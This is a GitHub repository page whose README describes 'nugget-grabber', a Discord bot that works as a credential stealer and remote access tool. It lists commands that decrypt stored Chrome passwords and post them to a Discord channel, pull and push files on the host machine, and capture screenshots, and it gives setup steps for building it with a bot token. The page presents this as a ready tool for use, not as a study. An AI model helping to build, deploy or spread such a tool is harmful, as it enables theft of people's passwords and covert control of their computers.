Skip to content

starshotaka90roirio/nugget-grabber

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

22 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

nugget-grabber

This script is a Discord bot written in Python using the discord.py library and the requests, socket, os, re, json, base64, sqlite3, win32crypt, Cryptodome, shutil, tempfile, asyncio, and PIL (Pillow) modules. The bot performs various functions, including basic commands such as ping, clearing messages, downloading/uploading files, capturing and sending screenshots, and grabbing stored passwords from Google Chrome.

Bot commands

;ping This command checks the bot's latency and responds with a message containing the latency in milliseconds.

;clear This command allows the bot to delete a specified number of messages (including the command itself) from the channel where the command was issued.

;grab passwords This command retrieves and decrypts stored passwords from Google Chrome's local database. The decrypted passwords are then sent as an embedded message to the Discord channel.

;download <file_path> This command allows users to download a file from the bot's host machine. The bot sends the file as an attachment in the Discord channel.

;upload <num_of_files> This command prompts the user to upload a specified number of files. The bot waits for the user to upload the files and saves them to its host machine.

;ss (or ;screenshot) This command captures a screenshot of the entire screen and sends it as an image file in the Discord channel.

Setup

  1. Make a discord application using discord's developer portal
  2. Click on bot

  1. Make-a-bot!
  2. Enable admin privelages, and enable discord gateway intents.
  3. Congrats! You built a bot! still not done though . . .
  4. Run pip install -r packs.txt in the command-line (this installs necessary libraries)
  5. Run builder.bat
  6. Go back to your discord bot page
  7. Click on reset token then copy your token (DO NOT SHARE YOUR TOKEN! A TOKEN IS LIKE A PASSWORD TO YOUR BOT, IF SOMEONE GOT IT, ITS BAD!)
  8. Back to builder and paste your token
  9. Wait til' it builds
  10. Voila!